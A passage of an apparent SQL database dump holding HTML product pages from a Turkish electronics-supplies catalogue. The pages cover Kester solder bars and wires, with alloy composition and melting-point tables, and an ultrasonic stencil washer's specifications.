start;\">&nbsp;</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>K100LD&nbsp;</td>\r\n<td>K100&nbsp;</td>\r\n<td>SAC305&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Kalay %&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp;99.3</td>\r\n<td style=\"text-align: center;\">99.4&nbsp;</td>\r\n<td style=\"text-align: center;\">96.5&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Gümüş %&nbsp;</td>\r\n<td style=\"text-align: center;\">0&nbsp;</td>\r\n<td style=\"text-align: center;\">0&nbsp;</td>\r\n<td style=\"text-align: center;\">3.0&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Bakır %&nbsp;</td>\r\n<td style=\"text-align: center;\">0.7&nbsp;</td>\r\n<td style=\"text-align: center;\">0.6&nbsp;</td>\r\n<td style=\"text-align: center;\">0.5&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Nikel içerir</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n</tr>\r\n<tr>\r\n<td>Bismuth içerir</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n</tr>\r\n<tr>\r\n<td>Erime Sıcaklığı</td>\r\n<td style=\"text-align: center;\">227<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">227<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">217-220<sup>o</sup>C</td>\r\n</tr>\r\n<tr>\r\n<td>Tavsiye Edilen Pota Sıcaklığı</td>\r\n<td style=\"text-align: center;\">255-265<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">255-265<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">250-260<sup>o</sup>C</td>\r\n</tr>\r\n<tr>\r\n<td>Ekleme</td>\r\n<td style=\"text-align: center;\">K100LDa</td>\r\n<td style=\"text-align: center;\">K100a</td>\r\n<td style=\"text-align: center;\">SAC300</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/kester_unpurities.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" style=\"width: 1255.3125px; word-spacing: 0px;\" title=\"Alaşımlar\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong>Mevcut Alaşımlar</strong></p>\r\n<table style=\"margin-left: 30px;\" border=\"1\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td>&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">Erime Sıcaklıkları&nbsp;&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Kurşunlu Alaşımlar&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn63Pb37</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;183°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn60Pb40</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;183-190°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Kurşunsuz Alaşımlar&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn96.5Ag3.5</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;221°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn96.5Ag3.0Cu0.5</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;217-220°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn95.5Ag3.8Cu0.7</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;217-221°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn99.3Cu0.7</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;227°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn100</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;232°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;K100</td>\r\n<td style=\"margin-left: 30px; text-align: right;\">&nbsp;<span style=\"font-size: 11px;\">227°C</span></td>\r\n</tr>\r\n</tbody>\r\n</table>','E-BAR SAC305','','','','e-bar'),(46,'Stencil Washer','<h5 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Semi-Automatic Stencil Washer</h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<p>/</p>\r\n<table style=\"font-family: Tahoma, Helvetica, Arial, sans-serif;\" border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/aqueous/A_StencilWasher-ECO_s.jpg\" alt=\"\" />&nbsp;</td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>Tam fonksiyonlu ultrasonic temizleme sistemi&nbsp;</strong></li>\r\n<li><strong>Krem lehim temizliği için hızlı, etkili ve ekonomik bir çözümdür</strong></li>\r\n<li><strong>Standart ekipman temizleme için gerekli tüm opsiyonları (yıkama, durulama, kurutma ve filtreleme)&nbsp;içerir</strong></li>\r\n<li><strong>Yarı otomatik kontrol</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><a href=\"http://www.aqueoustech.com/StencilWasher-Series.html\" style=\"color: #1b57b1; text-decoration: none;\"><span style=\"text-decoration: underline;\"><span style=\"color: #810081;\">&nbsp;</span></span></a></p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table cellspacing=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>Product</td>\r\n<td>Stencil Washer - ECO</td>\r\n</tr>\r\n<tr>\r\n<td>Application</td>\r\n<td>Solder Paste Removal</td>\r\n</tr>\r\n<tr>\r\n<td>Dimensions</td>\r\n<td>39\" L x 25\" W x 32\" H</td>\r\n</tr>\r\n<tr>\r\n<td>Weight</td>\r\n<td>350 lbs</td>\r\n</tr>\r\n<tr>\r\n<td>Construction</td>\r\n<td>Welded Tube Steel Frame<br />16 Gauge Steel Panels</td>\r\n</tr>\r\n<tr>\r\n<td>Finish</td>\r\n<td>Powder-Coating Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td>Internal Plumbing</td>\r\n<td>Stainless Steel Polypropylene</td>\r\n</tr>\r\n<tr>\r\n<td>Electrical Requirements</td>\r\n<td>110 VAC 10 amps</td>\r\n</tr>\r\n<tr>\r\n<td>Wash Tank Capacity</td>\r\n<td>20 Gallons (76 Liters)</td>\r\n</tr>\r\n<tr>\r\n<td>Maximum Stencil Size</td>\r\n<td>29\" x 29\" (74cm x 74cm)<br />25\" x 29\" Immersion</td>\r\n</tr>\r\n<tr>\r\n<td>Drain Requirements</td>\r\n<td>3/4\" NPT</td>\r\n</tr>\r\n<tr>\r\n<td>Wash Cycle Timer</td>\r\n<td>Analog 1-99 Minutes</td>\r\n</tr>\r\n<tr>\r\n<td>Ultrasonics</td>\r\n<td>500 Watt Side Mounted&nbsp;<br />Transducers</td>\r\n</tr>\r\n<tr>\r\n<td>Hand-Held Rinse Wand</td>\r\n<td>Standard</td>\r\n</tr>\r\n<tr>\r\n<td>Hand-Held Airknife</td>\r\n<td>Standard</td>\r\n</tr>\r\n<tr>\r\n<td>Wash Solution Heating System</td>\r\n<td>N/A</td>\r\n</tr>\r\n<tr>\r\n<td>Rinse Water Filtration System</td>\r\n<td>Optional</td>\r\n</tr>\r\n</tbody>\r\n</table>','Stencil Washer - ECO','','','','stencil-washer-eco'),(27,'E-BAR K100','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER E-BAR&nbsp;SOLDER BAR</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Karmaşık elektronik devreler ve PCB\'ler sadece endüstriyal metaryellerin uyumluluğunu istemezler, bununla birlikte kullanılan alaşımların tamamen metalik oksitlerden arındırılmış olması da gereklidir. KESTER E-Bar\'ın üretiminde sadece en yüksek saflıktaki daha önce işlenmemiş metaller kullanılır. KESTER E-Bar günümüz endüstri standartlarının çok üstünde saflıkta ürünler sunarak, tam metalik devamlılık, gelişmiş akışkanlık ve azaltılmış yüzey gerilimi sağlar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp; &nbsp;<img src=\"images/kester/kester_sb1.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_sb_3.png\" alt=\"\" width=\"146\" height=\"76\" border=\"0\" />&nbsp;<img src=\"images/kester/kester_sb_2.png\" alt=\"\" width=\"210\" height=\"102\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>K100LD&nbsp;</td>\r\n<td>K100&nbsp;</td>\r\n<td>SAC305&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Kalay %&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp;99.3</td>\r\n<td style=\"text-align: center;\">99.4&nbsp;</td>\r\n<td style=\"text-align: center;\">96.5&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Gümüş %&nbsp;</td>\r\n<td style=\"text-align: center;\">0&nbsp;</td>\r\n<td style=\"text-align: center;\">0&nbsp;</td>\r\n<td style=\"text-align: center;\">3.0&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Bakır %&nbsp;</td>\r\n<td style=\"text-align: center;\">0.7&nbsp;</td>\r\n<td style=\"text-align: center;\">0.6&nbsp;</td>\r\n<td style=\"text-align: center;\">0.5&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Nikel içerir</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n</tr>\r\n<tr>\r\n<td>Bismuth içerir</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n</tr>\r\n<tr>\r\n<td>Erime Sıcaklığı</td>\r\n<td style=\"text-align: center;\">227<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">227<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">217-220<sup>o</sup>C</td>\r\n</tr>\r\n<tr>\r\n<td>Tavsiye Edilen Pota Sıcaklığı</td>\r\n<td style=\"text-align: center;\">255-265<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">255-265<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">250-260<sup>o</sup>C</td>\r\n</tr>\r\n<tr>\r\n<td>Ekleme</td>\r\n<td style=\"text-align: center;\">K100LDa</td>\r\n<td style=\"text-align: center;\">K100a</td>\r\n<td style=\"text-align: center;\">SAC300</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/kester_unpurities.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" style=\"width: 1255.3125px; word-spacing: 0px;\" title=\"Alaşımlar\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong>Mevcut Alaşımlar</strong></p>\r\n<table style=\"margin-left: 30px;\" border=\"1\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td>&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">Erime Sıcaklıkları&nbsp;&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Kurşunlu Alaşımlar&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn63Pb37</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;183°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn60Pb40</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;183-190°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Kurşunsuz Alaşımlar&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn96.5Ag3.5</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;221°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn96.5Ag3.0Cu0.5</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;217-220°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn95.5Ag3.8Cu0.7</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;217-221°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn99.3Cu0.7</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;227°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn100</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;232°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;K100</td>\r\n<td style=\"margin-left: 30px; text-align: right;\">&nbsp;<span style=\"font-size: 11px;\">227°C</span></td>\r\n</tr>\r\n</tbody>\r\n</table>','E-BAR K100','','','','e-bar-26'),(28,'Lead-free Solder Wire - 1.2mm','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER SOLDER WIRE</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','275-K100-1.2mm','','','','275-k100-1.2mm'),(29,'Sn63Pb37 Solder Wire - 0.4mm','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER LEHİM TELİ</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','245-Sn63Pb37-0.8mm','','','','245-sn63pb37-0.8mm'),(30,'Sn60Pb40 Solder Wire','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER SOLDER WIRE</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" 